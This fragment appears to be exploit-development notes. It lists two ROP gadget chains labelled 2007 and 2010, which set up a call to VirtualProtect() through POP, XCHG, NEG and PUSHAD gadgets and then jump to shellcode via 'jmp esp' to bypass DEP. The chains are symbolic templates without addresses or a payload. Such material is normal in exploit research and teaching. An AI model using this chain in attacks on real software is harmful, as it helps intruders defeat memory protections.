2007 POP EAX # RETN ptr to VirtualProtect() POP EBP # RETN skip 4 bytes POP EBX # RETN Safe size to NEG XCHG EAX, EBX # RETN NEG EAX # RETN XCHG EAX, EBX # RETN POP EDX # RETN 0x00000040 XCHG EAX, EDX # RETN NEG EAX # RETN XCHG EAX, EDX # RETN POP ECX # RETN Writable location POP EDI # RETN RETN (ROP NOP) POP ESI # RETN JMP [EAX] PUSHAD # RETN ptr to 'jmp esp' 2010 POP EBP # RETN skip 4 bytes POP EBX # RETN Safe size to NEG XCHG EAX, EBX # RETN NEG EAX # POP ESI # RETN JUNK XCHG EAX, EBX # RETN POP EDX # RETN 0x00000040 XCHG EAX, EDX # RETN NEG EAX # POP ESI # RETN JUNK XCHG EAX, EDX # RETN POP ECX # RETN Writable location POP EDI # RETN RETN (ROP NOP) POP ESI # RETN JMP [EAX] POP EAX # RETN ptr to VirtualProtect() PUSHAD # RETN ptr to 'jmp esp'